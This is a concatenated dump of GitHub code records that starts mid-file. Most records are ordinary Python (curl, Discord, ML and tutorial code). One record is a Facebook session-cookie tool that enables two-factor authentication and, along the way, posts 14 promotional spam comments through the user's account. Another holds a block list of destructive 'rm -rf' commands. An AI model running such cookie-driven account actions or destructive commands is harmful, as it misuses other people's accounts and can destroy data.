lst:\r\n\t\t\t\t\t\tmemek.update(\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tx.get(\r\n\t\t\t\t\t\t\t\t\t\"name\"\r\n\t\t\t\t\t\t\t\t):x.get(\r\n\t\t\t\t\t\t\t\t\t\"value\"\r\n\t\t\t\t\t\t\t\t)\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t)\r\n\t\t\t\tmemek.update(\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t\"pass\":sandi\r\n\t\t\t\t\t}\r\n\t\t\t\t)\r\n\t\t\t\tresponse = ses.post(\r\n\t\t\t\t\tlanjut.get(\r\n\t\t\t\t\t\t\"action\"\r\n\t\t\t\t\t),cookies=self.coki,data=memek\r\n\t\t\t\t).text\r\n\t\t\t\tif \"The password you entered is not correct.\" in response:\r\n\t\t\t\t\texit(\" ! The password you entered is not correct.\")\r\n\t\t\t\telse:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tkode = self.get_kode(response)\r\n\t\t\t\t\texcept IndexError:\r\n\t\t\t\t\t\texit(\" × Facebook Caught checkpoint\")\r\n\t\t\t\tprint(\"\\n * Key authen:\",kode,\"\\n * Enter the authentic key in the authentic app 2 factor!\\n\")\r\n\t\t\telse:\r\n\t\t\t\texit(\" × Facebook Caught checkpoint\")\r\n\t\tself.masuk(co)\r\n\t\r\n\tdef spam(self,cokii):\r\n\t\tprint(\" ! To avoid the checkpoint tools will delete comments on the author's post as much as 14 spam.\\n * The process is running please wait...\\n\")\r\n\t\tsp.Main(\r\n\t\t\tcokii\r\n\t\t).gasken(\r\n\t\t\t14,\"Ravi Handsom:v\"\r\n\t\t)\r\n\r\nclass Pasang(Main):\r\n\t\r\n\tdef pasang(self,link,data_code):\r\n\t\treturn ses.post(\r\n\t\t\t\"https://mbasic.facebook.com\"+str(\r\n\t\t\t\tlink\r\n\t\t\t),data=data_code,cookies=self.coki\r\n\t\t).text\r\n\tdef get_kode(self,res):\r\n\t\tkode = re.findall(\r\n\t\t\t'\\
Or enter this code into your authentication app<\\/div\\>\\
(.*?)<\\/div\\>\\<\\/div\\>',str(\r\n\t\t\t\tres\r\n\t\t\t)\r\n\t\t)[0]\r\n\t\treturn kode\r\n\tdef kode_pemulihan(self,kontol):\r\n\t\tnum = 0\r\n\t\tfor x in kontol.find_all('span'):\r\n\t\t\tif(\r\n\t\t\t\tre.findall(\r\n\t\t\t\t\t'\\d+\\s\\d+',str(\r\n\t\t\t\t\t\tx\r\n\t\t\t\t\t)\r\n\t\t\t\t)\r\n\t\t\t):\r\n\t\t\t\tnum+=1\r\n\t\t\t\tif(num==1):\r\n\t\t\t\t\tprint(f\" \\_> {x.text}\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tprint(f\" |_> {x.text}\")\r\n\tdef get_kode_pemulihan(self):\r\n\t\twaifu_wangy = {\r\n\t\t\t\"Host\":\"mbasic.facebook.com\",\r\n\t\t\t\"accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\",\r\n\t\t\t\"accept-language\":\"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7\",\r\n\t\t\t\"content-type\":\"application/x-www-form-urlencoded\",\r\n\t\t\t\"origin\":\"https://www.facebook.com\",\r\n\t\t\t\"referer\":\"https://www.facebook.com\",\r\n\t\t\t\"upgrade-insecure-requests\":\"2\",\r\n\t\t\t\"user-agent\":\"Mozilla/5.0 (Mobile; rv:48.0; A405DL) Gecko/48.0 Firefox/48.0 KAIOS/2.5\"\r\n\t\t}\r\n\t\tses.headers.update(waifu_wangy)\r\n\t\t__res = ses.get(\"https://mbasic.facebook.com/security/2fac/factors/recovery-code/\",cookies=self.coki).text\r\n\t\tkontol = par(__res, 'html.parser')\r\n\t\tif \"Use the recovery code to log in if you lose your phone or can't receive the verification code via text message or authentication app.\" in __res:\r\n\t\t\tdata = {}\r\n\t\t\tlst = [\"fb_dtsg\",\"jazoest\",\"reset\"]\r\n\t\t\tfor x in kontol.find(\r\n\t\t\t\t'form',{\r\n\t\t\t\t\t'method':'post'\r\n\t\t\t\t}\r\n\t\t\t):\r\n\t\t\t\tif x.get('name') in lst:\r\n\t\t\t\t\tdata.update(\r\n\t\t\t\t\t\t{x.get(\r\n\t\t\t\t\t\t\t'name'\r\n\t\t\t\t\t\t):x.get(\r\n\t\t\t\t\t\t\t'value'\r\n\t\t\t\t\t\t)\r\n\t\t\t\t\t}\r\n\t\t\t\t)\r\n\t\t\tdata.update(\r\n\t\t\t\t{\r\n\t\t\t\t\t\"\":\"Get Code\"\r\n\t\t\t\t}\r\n\t\t\t)\r\n\t\t\tkontol = par(\r\n\t\t\t\tses.post(\r\n\t\t\t\t\t\"https://mbasic.facebook.com/security/2fac/factors/recovery-code/\",cookies=self.coki,data=data\r\n\t\t\t\t).text, 'html.parser'\r\n\t\t\t)\r\n\t\t\tself.kode_pemulihan(kontol)\r\n\t\telse:\r\n\t\t\tself.kode_pemulihan(kontol)\r\n\tdef masuk(self,co):\r\n\t\tdata = {}\r\n\t\tmasuk = input(\" + input code authen: \")\r\n\t\tlst = [\"fb_dtsg\",\"jazoest\",\"code_handler_type\",\"confirmButton\"]\r\n\t\tlanjut = co.find(\r\n\t\t\t'form',{\r\n\t\t\t\t'method':'post'\r\n\t\t\t}\r\n\t\t)\r\n\t\tfor x in lanjut:\r\n\t\t\tif x.get('name') in lst:\r\n\t\t\t\tdata.update(\r\n\t\t\t\t\t{x.get(\r\n\t\t\t\t\t\t'name'\r\n\t\t\t\t\t):x.get(\r\n\t\t\t\t\t\t'value'\r\n\t\t\t\t\t)\r\n\t\t\t\t}\r\n\t\t\t)\t\r\n\t\tdata.update(\r\n\t\t\t{\r\n\t\t\t\t'confirmButton':'Lanjutkan'\r\n\t\t\t}\r\n\t\t)\r\n\t\tres = par(\r\n\t\t\tses.post(\r\n\t\t\t\t'https://mbasic.facebook.com'+str(\r\n\t\t\t\t\tlanjut.get(\r\n\t\t\t\t\t\t\"action\"\r\n\t\t\t\t\t)\r\n\t\t\t\t),cookies=self.coki,data=data\r\n\t\t\t).text, 'html.parser'\r\n\t\t)\r\n\t\tdata.clear()\r\n\t\tlanjut = res.find(\r\n\t\t\t\"form\",{\r\n\t\t\t\t\"id\":\"input_form\"\r\n\t\t\t}\r\n\t\t)\r\n\t\tlst = [\"fb_dtsg\",\"jazoest\"]\r\n\t\tfor x in lanjut:\r\n\t\t\tif x.get(\"name\") in lst:\r\n\t\t\t\tdata.update(\r\n\t\t\t\t\t{x.get(\r\n\t\t\t\t\t\t\"name\"\r\n\t\t\t\t\t):x.get(\r\n\t\t\t\t\t\t\"value\"\r\n\t\t\t\t\t)\r\n\t\t\t\t}\r\n\t\t\t)\r\n\t\tdata.update({\r\n\t\t\t\"code\":masuk,\r\n\t\t\t\"submit_code_button\":\"Lanjutkan\"\r\n\t\t})\r\n\t\tresponse = self.pasang(\r\n\t\t\tlanjut.get(\r\n\t\t\t\t\"action\"\r\n\t\t\t),data\r\n\t\t)\r\n\t\tif \"checkpoint\" in response:\r\n\t\t\texit(\" × Account ops exposed checkpoint\")\r\n\t\telif \"Active Two-Factor Authentication \" in response:\r\n\t\t\tprint(\" √ a2f Installed successfully ^^\")\r\n\t\t\tprint(\" * Recovery code: \")\r\n\t\t\tself.get_Recovery_code()\r\n\t\telse:\r\n\t\t\tprint(\" ! Text:\",response)\r\n\t\t\texit(\" × Something went wrong in the script, try reporting it to the developer. Copy text on! Send to wa 03425081910. \")\r\n\r\n__import__('os').system('clear')\r\n\r\nif __name__==\"__main__\":\r\n\tprint(\r\n\t\tPasang(\r\n\t\t\t\"\"\r\n\t\t).logo(\r\n\t\t)\r\n\t)\r\n\tcokii = input(\" + Get cookie: \")\r\n\tresss = req.get(\r\n\t\t\"https://mbasic.facebook.com/profile.php\",cookies={\r\n\t\t\t\"cookie\":cokii\r\n\t\t}\r\n\t).text\r\n\tif \"mbasic_logout_button\" in resss:\r\n\t\tnama = re.findall(\r\n\t\t\t'\\
(.*?)<\\/title\\>',str(\r\n\t\t\t\tresss\r\n\t\t\t)\r\n\t\t)[0]\r\n\t\tprint(f' √ Cookies accept\\n ^ Welcome {nama}\\n')\r\n\t\tmenuju = Pasang(cokii)\r\n\t\tmenuju.spam(cokii)\r\n\t\tmenuju.cek()\r\n\telse:\r\n\t\texit(\" × Cookies invalid\")\r\n","repo_name":"shadow-hackr/2fa","sub_path":"2fa.py","file_name":"2fa.py","file_ext":"py","file_size_in_byte":8717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8232482906","text":"import sys\nimport ctypes as ct\n\nimport ebcdic\nimport libcurl as lcurl\nfrom curltestutils import * # noqa\n\n\n# The IBM-1047 EBCDIC codeset is used for this example but the code\n# would be similar for other non-ASCII codesets.\n#\n# Three callback functions are created below:\n# my_conv_from_ascii_to_ebcdic,\n# my_conv_from_ebcdic_to_ascii, and\n# my_conv_from_utf8_to_ebcdic\n#\n# The \"platform_xxx\" calls represent platform-specific conversion routines.\n\n\ndef ascii_to_ebcdic(source: bytes) -> bytes:\n return source.decode(\"ascii\").encode(\"cp1148\")\n\n\ndef ebcdic_to_ascii(source: bytes) -> bytes:\n return source.decode(\"cp1148\").encode(\"ascii\")\n\n\ndef utf8_to_ebcdic(source: bytes) -> bytes:\n return source.decode(\"utf-8\").encode(\"cp1148\")\n\n\n@lcurl.conv_callback\ndef my_conv_from_ascii_to_ebcdic(buffer, length):\n try:\n original = bytes(buffer[:length])\n converted = ascii_to_ebcdic(bytes(buffer[:length]))\n ct.memmove(buffer, converted, len(converted))\n except:\n return lcurl.CURLE_CONV_FAILED\n else:\n return lcurl.CURLE_OK\n\n\n@lcurl.conv_callback\ndef my_conv_from_ebcdic_to_ascii(buffer, length):\n try:\n original = bytes(buffer[:length])\n converted = ebcdic_to_ascii(bytes(buffer[:length]))\n ct.memmove(buffer, converted, len(converted))\n except:\n return lcurl.CURLE_CONV_FAILED\n else:\n return lcurl.CURLE_OK\n\n\n@lcurl.conv_callback\ndef my_conv_from_utf8_to_ebcdic(buffer, length):\n try:\n original = bytes(buffer[:length])\n converted = utf8_to_ebcdic(bytes(buffer[:length]))\n ct.memmove(buffer, converted, len(converted))\n except:\n return lcurl.CURLE_CONV_FAILED\n else:\n return lcurl.CURLE_OK\n\n\ndef main(argv=sys.argv[1:]):\n\n url: str = argv[0] if len(argv) >= 1 else \"https://example.com\"\n\n curl: ct.POINTER(lcurl.CURL) = lcurl.easy_init()\n\n with curl_guard(False, curl):\n if not curl: return 1\n\n lcurl.easy_setopt(curl, lcurl.CURLOPT_URL, url.encode(\"utf-8\"))\n if defined(\"SKIP_PEER_VERIFICATION\"):\n lcurl.easy_setopt(curl, lcurl.CURLOPT_SSL_VERIFYPEER, 0)\n # use platform-specific functions for codeset conversions\n lcurl.easy_setopt(curl, lcurl.CURLOPT_CONV_FROM_NETWORK_FUNCTION,\n my_conv_from_ascii_to_ebcdic)\n lcurl.easy_setopt(curl, lcurl.CURLOPT_CONV_TO_NETWORK_FUNCTION,\n my_conv_from_ebcdic_to_ascii)\n lcurl.easy_setopt(curl, lcurl.CURLOPT_CONV_FROM_UTF8_FUNCTION,\n my_conv_from_utf8_to_ebcdic)\n lcurl.easy_setopt(curl, lcurl.CURLOPT_VERBOSE, 1)\n\n # Perform the custom request\n res: int = lcurl.easy_perform(curl)\n\n # Check for errors\n if res != lcurl.CURLE_OK:\n handle_easy_perform_error(res)\n\n return 0\n\n\nsys.exit(main())\n","repo_name":"karpierz/libcurl","sub_path":"examples/sampleconv.py","file_name":"sampleconv.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"41333629745","text":"# coding=utf-8\n\"\"\"Text encoding UTF-8\"\"\"\n\n# python built-in modules\nimport importlib\nimport logging\nimport sys\n\n# other modules\nimport asyncio\nimport discord\n\n# sophia modules\nimport commands\nimport bot_system\nimport room\nimport chat_tunnel\n\nlogging.basicConfig(level=logging.INFO)\nSystem = bot_system.SystemVariables(\n prefix_qualifier='>',\n prefix='>>',\n test_mode=False,\n allowed_testing=['154488551596228610', '164476517101993984'],\n atsui=('153789058059993088', '207711558866960394'),\n trigger_exclude=['110373943822540800'],\n previous_playing_message=None,\n forbidden_eval=('rm -rf /home/*',\n 'require(\"child_process\").exec(\"rm -rf /home/*\")',\n 'rm -rf / --nopreserveroot'),\n token_status=False,\n custom_filename_status=False,\n custom_filename_path='',\n eval_error_message=('ya dun goofed', 'AAAAAAAAAAAAAaaaaaaaaaaa', 'GRAND DAD', 'b-baka!!!',\n 'i-its not like I want to help you or anything!', 'git gud', 'did you re-read the code before entering it?',\n 'too much php for today?', 'maybe you need some rest?', 'maybe this might help you?',\n 'some snek told me this', 'still better than recursive infinite loop', 'you\\'ve messed up again?',\n 'try not to rely on eval too much', 'don\\'t worry, at least you\\'re improving',\n 'maybe you need to understand the code first before evaling?', 'zzz', ':eyes:', 'wew',\n '418 I\\'m a teapot', 'are you bored at the moment?', 'you\\'ve tried™', 'sdjkfhakjlhfskajhfkjlhf',\n 'what are you doing?', 'I am an error message fairy', 'are you having fun?', 'wew lad',\n 'how many times are you going to do this?', 'p-please be gentle', 'you have found a rare item!',\n 'I\\'ll slap you for this', 'no cookies for you today!', 'I\\'ll revoke your programming certificate',\n 'again?'))\nRoomInfo = room.RoomInformations([], [['Blackjack'], [6]],\n ('Waiting', 'In Progress', 'Deleted'),\n [['Testing room', 'Blackjack', 'Testing', '0']])\nTunnelInfo = chat_tunnel.TunnelInformations([], [], [], [], [], [[[True, False, 'Global Chat', '']]])\nsophia = discord.Client()\n\n@sophia.event\nasync def on_ready():\n \"\"\"Triggers when the bot is starting up.\"\"\"\n print(' [][][]')\n print(' [][] [][]')\n print(' [][] [][]')\n print(' [][] [][]')\n print('[][] [][]')\n print('[] [][] [][] []')\n print('[] [][] [][] []')\n print('[] [][] [][] []')\n print('[] [][] [] [][] []')\n print('[] [][] [] [][] []')\n print('[][] [] [][]')\n print(' [][] [] [][]')\n print(' [][] [] [][]')\n print(' [][] [] [][]')\n print(' [][][]')\n print('Logged in as ' + sophia.user.name + ', Discord ID ' + sophia.user.id + '.')\n print('Program created by SamuiNe ')\n System.previous_playing_message = System.prefix + 'help for help'\n if System.test_mode:\n await sophia.change_presence(game=discord.Game(name='\\u26A0 TEST MODE \\u26A0'))\n else:\n await sophia.change_presence(game=discord.Game(name=System.previous_playing_message))\n\n token.close()\n print('Sophia Version ' + commands.__version__ + ', Ready.')\n\n\n@sophia.event\nasync def on_message(message):\n \"\"\"Triggers when the bot receives a message.\"\"\"\n print(message)\n message_low = message.content.lower()\n\n is_allowed = True\n is_person = True\n\n if message.author.bot:\n is_person = False\n\n if System.test_mode:\n if message.server.id not in System.allowed_testing:\n is_allowed = False\n\n if is_person and is_allowed:\n if message.content.startswith(System.prefix_qualifier):\n\n if message.content.startswith(System.prefix):\n await commands.command_process(asyncio, discord, bot_system, chat_tunnel, System, sophia, message,\n message_low, TunnelInfo)\n\n elif message.author.id in System.ATSUI:\n if message.content is '<>modulereload' or '>_<\\n\\n\\n')\nwhile True:\n name = input('entew youw nyame pwease. >_<\\n')\n bid = int(input('\\n\\nentew youw bid pwease. XD\\n'))\n\n auction[name] = bid\n\n if input('\\n\\n\\nawe thewe any othew biddews?\\nyes o-ow nyo\\n') == 'nyo':\n break\n\nhighest_bid = 0\nhighest_bidder = ''\nfor key in auction:\n if auction[key] > highest_bid:\n highest_bid = auction[key]\n highest_bidder = key\n\nprint(\n f'\\n\\n\\n\\nthe winnew of the secwet auction p-pwogwam is {highest_bidder} with a-a bid of {auction[highest_bidder]}')\n","repo_name":"not-lucky/100_Days_of_Code_-_The_Complete_Python_Pro_Bootcamp_for_2022","sub_path":"Day 09 - Beginner - Dictionaries, Nesting and the Secret Auction/03_PROJECT_blind_auction/blind_auction.py","file_name":"blind_auction.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"548955207","text":"# With method object\nclass Person:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def myfunc(self):\n print(\"Hello my name is \"+ self.name)\n\np1 = Person(\"John\",36)\np1.myfunc()\n\n# Delete\ndel p1.age # instance variable\nprint(p1.age)\n\ndel p1\nprint(p1.name)","repo_name":"HarshDex/All-Programs","sub_path":"c++/Zcollege/python/unit5/M5_Task_03_OOPsUsingPython_Part_1.py","file_name":"M5_Task_03_OOPsUsingPython_Part_1.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23495806651","text":"\r\ndef isHappy (flipStack):\r\n\r\n happySideCount = 0\r\n for i in flipStack:\r\n if i == '+': happySideCount += 1\r\n else: break\r\n\r\n return happySideCount == len(flipStack)\r\n\r\n\r\ndef flip (flipStack, side, limitSize):\r\n \r\n for i in range(limitSize):\r\n flipStack[i] = side\r\n\r\n\r\n \r\n# main\r\ninputFile = open ('B-large.in', 'r')\r\noutputFile = open('output.txt', 'w')\r\n\r\ntestCase = int(inputFile.readline())\r\nfor i in range(testCase):\r\n\r\n flipStack = [i for i in inputFile.readline().replace('\\n', '')]\r\n answer = 0\r\n\r\n \r\n while not isHappy (flipStack):\r\n\r\n for idx, val in enumerate (flipStack):\r\n if (idx < (len(flipStack) - 1) and val != flipStack[idx + 1])\\\r\n or idx == (len(flipStack) - 1):\r\n # flip\r\n flip (flipStack, ('+' if flipStack[idx] == '-' else '-'), idx + 1)\r\n \r\n break\r\n \r\n answer += 1\r\n else: outputFile.write('Case #{0}: {1}\\n'.format(i + 1, answer))\r\n\r\n \r\ninputFile.close()\r\noutputFile.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_178/2681.py","file_name":"2681.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9128535354","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager as fm\nfrom matplotlib.colors import ListedColormap\n\n# 결정경계 확인 함수\ndef plot_decision_boundary(clf, X, y, axes=[-1.5, 2.5, -1, 1.5], alpha=0.5, contour=True):\n x1s = np.linspace(axes[0], axes[1], 100)\n x2s = np.linspace(axes[2], axes[3], 100)\n x1, x2 = np.meshgrid(x1s, x2s)\n X_new = np.c_[x1.ravel(), x2.ravel()]\n y_pred = clf.predict(X_new).reshape(x1.shape)\n custom_cmap = ListedColormap(['#fafab0', '#9898ff', '#a0faa0'])\n plt.contourf(x1, x2, y_pred, alpha=0.3, cmap=custom_cmap)\n if contour:\n custom_cmap2 = ListedColormap(['#7d7d58', '#4c4c7f', '#507d50'])\n plt.contour(x1, x2, y_pred, cmap=custom_cmap2, alpha=0.8)\n plt.plot(X[:, 0][y == 0], X[:, 1][y == 0], \"yo\", alpha=alpha)\n plt.plot(X[:, 0][y == 1], X[:, 1][y == 1], \"bs\", alpha=alpha)\n plt.axis(axes)\n plt.xlabel(r\"$x_1$\", fontsize=18)\n plt.ylabel(r\"$x_2$\", fontsize=18, rotation=0)\n\n# 데이터 호출\niris = load_iris()\nprint(iris.DESCR)\nprint(iris.__dir__())\n\ndata = iris[\"data\"]\nlabel = iris[\"target\"]\n\n# 꽃잎 너비로 학습 / iris 종이 Virginica면 1, 아니면 0\nx = data[:, 3:]\ny = (label==2).astype(np.int)\n\nmodel = LogisticRegression()\nmodel.fit(x, y)\n\nx_new = np.linspace(0, 3, 1000).reshape(-1, 1)\ny_prob = model.predict_proba(x_new)\ndecision_boundary = x_new[y_prob[:, 1] >= 0.5][0]\n\nplt.figure(figsize=(8, 3))\nplt.plot(x[y==0], y[y==0], \"bs\")\nplt.plot(x[y==1], y[y==1], \"g^\")\nplt.plot([decision_boundary, decision_boundary], [-1, 2], \"k:\", linewidth=2)\nplt.plot(x_new, y_prob[:, 1], \"g-\", linewidth=2, label=\"Iris-Virginica\")\nplt.plot(x_new, y_prob[:, 0], \"b--\", linewidth=2, label=\"Not Iris-Virginica\")\nplt.text(decision_boundary+0.02, 0.15, \"Decision\\nBoundary\", fontsize=14, color=\"k\", ha=\"center\")\nplt.arrow(decision_boundary, 0.08, -0.3, 0, head_width=0.05, head_length=0.1, fc='b', ec='b')\nplt.arrow(decision_boundary, 0.92, 0.3, 0, head_width=0.05, head_length=0.1, fc='g', ec='g')\nplt.xlabel(\"Width (cm)\", fontsize=14)\nplt.ylabel(\"Prob\", fontsize=14)\nplt.legend(loc=\"center left\", fontsize=14)\nplt.axis([0, 3, -0.02, 1.02])\n# plt.save_fig(\"logistic_regression_plot\")\nplt.show()\n\npred = model.predict_prob([[1.7], [1.5]])\nprint(pred)\n\n# iris data - Logistic Regression\niris = load_iris()\n\ndata = pd.DataFrame(iris[\"data\"])\ndata.columns=['sepal_len', 'sepal_wid', 'petal_len', 'petal_wid']\ndata[\"species\"] = iris[\"target\"]\n\nx = data.iloc[:, :-1].values\ny = (data.iloc[:, -1].values==2).astype(np.int)\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3, random_state=42)\n\nmodel = LogisticRegression()\nmodel.fit(x_train, y_train)\n\ny_pred = model.predict(x_test)\ny_pred_prob = model.predict_proba(x_test)\n\n","repo_name":"slykid/Python3","sub_path":"Python Machine Learning Code/LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7936502337","text":"a=input()\nc=0\nfor i in range(len(a),5,-1):\n b=a[i-6:i]\n if(b=='111111' or b=='000000'):\n c=1\n print(\"Sorry, sorry!\")\n break\nif c==0:\n print(\"Good luck!\")\n","repo_name":"kiransivasai/hackerearth_problems","sub_path":"little_jhool.py","file_name":"little_jhool.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"36600117316","text":"import customtkinter as ctk\nfrom gui.widgets import *\n\nclass App(ctk.CTk):\n def __init__(self):\n super().__init__()\n self.title(\"Webpage Autorefresh\")\n self.screen_width = self.winfo_screenwidth()\n self.screen_height = self.winfo_screenheight()\n self.window_width = 700\n self.window_height = 600\n self.x_coordinate = int((self.screen_width/2) - (self.window_width/2))\n self.y_coordinate = int((self.screen_height/2) - (self.window_height/1.9))\n self.geometry(f\"{self.window_width}x{self.window_height}+{self.x_coordinate}+{self.y_coordinate}\")\n self.grid_columnconfigure(0, weight=1)\n\n self.header = Header(master=self, width = 550, height = 150)\n self.header.grid(pady=(10, 5))\n self.links_container = LinksContainer(self, width = 550, height = 400)\n self.links_container.grid(pady=5)\n self.get_browser()\n \n def get_browser(self):\n with open(\"browser_path.txt\", \"r\") as f:\n if not os.path.isfile(f.readline()):\n GetBrowserWindow(self)\n\n\n\nif __name__ == \"__main__\":\n app = App()\n app.mainloop()\n","repo_name":"d4niel-bautista/Webpage-Autorefresh","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19805226054","text":"# ### Problem **4: Arrange string characters such that lowercase letters should come first**\n# Given string contains a combination of the lower and upper case letters. Write a program to arrange the characters of a string so that all lowercase letters should come first.\n# **Given**:\n# ```\n# str1 = PyNaTive\n# ```\n# **Expected Output**:\n# ```\n# yaivePNT\n# ```\n\nstr1 = \"PyNaTive\"\n\ns1 = \"\" \ns2 = \"\" \n\nfor char in str1:\n if char.islower():\n s1 = s1 + char\n else:\n s2 = s2 + char\n\nresult = s1 + s2 \n\nprint(result)\n","repo_name":"kuldeepkd13/LearningPython","sub_path":"set2/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"44490688937","text":"from collections import defaultdict\nfrom typing import Sequence, Union, Optional, Dict, Tuple\nfrom warnings import warn\n\nimport torch\nimport numpy as np\n\nfrom scipy.stats import rankdata\n\nfrom .base import MixedEffectsModule, ReSolver\nfrom .utils import chunk_grouped_data, validate_tensors, validate_group_ids\nfrom torch.distributions import MultivariateNormal\n\nfrom torch_hlm.low_rank import WoodburyMultivariateNormal\n\n\nclass GaussianReSolver(ReSolver):\n\n def __init__(self,\n X: torch.Tensor,\n y: torch.Tensor,\n group_ids: np.ndarray,\n weights: Optional[torch.Tensor],\n design: dict,\n **kwargs):\n self.iterative = len(design) > 1\n super().__init__(X=X, y=y, group_ids=group_ids, weights=weights, design=design, **kwargs)\n\n def _calculate_htild_inv(self, XtX: torch.Tensor, pp: torch.Tensor) -> torch.Tensor:\n return torch.inverse(XtX + pp)\n\n @staticmethod\n def ilink(x: torch.Tensor) -> torch.Tensor:\n return x\n\n def _calculate_grad(self,\n X: torch.Tensor,\n y: torch.Tensor,\n mu: torch.Tensor) -> torch.Tensor:\n _, num_res = X.shape\n return X * (y - mu).unsqueeze(-1).expand(-1, num_res)\n\n def solve_step(self,\n X: torch.Tensor,\n y: torch.Tensor,\n offset: torch.Tensor,\n group_ids: np.ndarray,\n weights: torch.Tensor,\n prior_precision: torch.Tensor,\n Htild_inv: torch.Tensor,\n prev_res: Optional[torch.Tensor],\n iter_: int,\n converged_mask: Optional[np.ndarray] = None,\n XtX: Optional[torch.Tensor] = None,\n **kwargs\n ) -> torch.Tensor:\n if self.iterative:\n return super(GaussianReSolver, self).solve_step(\n X=X,\n y=y,\n offset=offset,\n group_ids=group_ids,\n weights=weights,\n prior_precision=prior_precision,\n Htild_inv=Htild_inv,\n prev_res=prev_res,\n converged_mask=converged_mask,\n iter_=iter_\n )\n else:\n assert converged_mask is None\n assert XtX is not None\n num_obs, num_res = X.shape\n num_groups = len(XtX)\n group_ids_seq = torch.as_tensor(rankdata(group_ids, method='dense') - 1)\n group_ids_broad = group_ids_seq.unsqueeze(-1).expand(-1, num_res)\n assert y.shape == weights.shape\n yoff = (y - offset)\n Xty_els = X * yoff.unsqueeze(1) * weights.unsqueeze(1)\n Xty = torch.zeros(num_groups, num_res).scatter_add(0, group_ids_broad, Xty_els)\n return torch.linalg.solve(XtX + prior_precision, Xty.unsqueeze(-1)).squeeze(-1)\n\n @staticmethod\n def _get_hessian(\n X: torch.Tensor,\n weights: torch.Tensor,\n mu: torch.Tensor) -> torch.Tensor:\n return weights * X.t() @ X\n\n\nclass GaussianMixedEffectsModule(MixedEffectsModule):\n solver_cls = GaussianReSolver\n\n def __init__(self,\n fixeff_features: Union[int, Sequence],\n raneff_features: Dict[str, Union[int, Sequence]],\n fixed_effects_nn: Optional[torch.nn.Module] = None,\n covariance: str = 'log_cholesky',\n re_scale_penalty: Union[float, dict] = 0.):\n super().__init__(\n fixeff_features=fixeff_features,\n raneff_features=raneff_features,\n fixed_effects_nn=fixed_effects_nn,\n covariance=covariance,\n re_scale_penalty=re_scale_penalty,\n )\n self._residual_std_dev_log = torch.nn.Parameter(.01 * torch.randn(1))\n\n def _forward_to_distribution(self, pred: torch.Tensor, **kwargs) -> torch.distributions.Distribution:\n return torch.distributions.Normal(loc=pred, scale=self.residual_var ** .5, **kwargs)\n\n @property\n def residual_var(self) -> torch.Tensor:\n std = self._residual_std_dev_log.exp()\n if torch.isclose(std, torch.zeros_like(std)):\n eps = 0.001\n warn(f\"`{type(self)}().residual_var` near-zero, adding {eps ** 2}\")\n std = std + eps\n return std ** 2\n\n def _get_loss(self,\n X: torch.Tensor,\n y: torch.Tensor,\n group_ids: np.ndarray,\n weights: Optional[torch.Tensor],\n cache: dict,\n loss_type: Optional[str] = None,\n **kwargs):\n if loss_type == 'mvnorm':\n return -self._get_mvnorm_log_prob(X=X, y=y, group_ids=group_ids, weights=weights, **kwargs)\n return super()._get_loss(\n X=X, y=y, group_ids=group_ids, cache=cache, loss_type=loss_type, weights=weights, **kwargs\n )\n\n def _get_default_loss_type(self) -> str:\n if len(self.rf_idx) == 1:\n return 'mvnorm'\n else:\n return 'iid'\n\n def _get_iid_log_probs(self,\n pred: torch.Tensor,\n actual: torch.Tensor,\n weights: torch.Tensor) -> torch.Tensor:\n dist = self._forward_to_distribution(pred, validate_args=False)\n dist.scale = dist.scale / torch.sqrt(weights)\n log_probs = dist.log_prob(actual)\n return log_probs\n\n def _get_mvnorm_log_prob(self,\n X: torch.Tensor,\n y: torch.Tensor,\n group_ids: np.ndarray,\n weights: Optional[torch.Tensor],\n **kwargs) -> torch.Tensor:\n extra = set(kwargs)\n if extra:\n warn(f\"Ignoring {extra}\")\n\n X, y = validate_tensors(X, y)\n group_ids = validate_group_ids(group_ids, num_grouping_factors=len(self.grouping_factors))\n if weights is None:\n weights = torch.ones_like(y)\n assert weights.shape == y.shape\n\n if len(self.grouping_factors) > 1:\n raise NotImplementedError\n # mercifully, if there is one grouping-factor, overall prob is just product of individual probs:\n gf = self.grouping_factors[0]\n\n # model-mat for raneffects:\n Z = torch.cat([torch.ones((len(X), 1)), X[:, self.rf_idx[gf]]], 1)\n\n Xs_by_r = defaultdict(list)\n ys_by_r = defaultdict(list)\n Zs_by_r = defaultdict(list)\n ws_by_r = defaultdict(list)\n for Z_g, X_g, y_g, w_g in 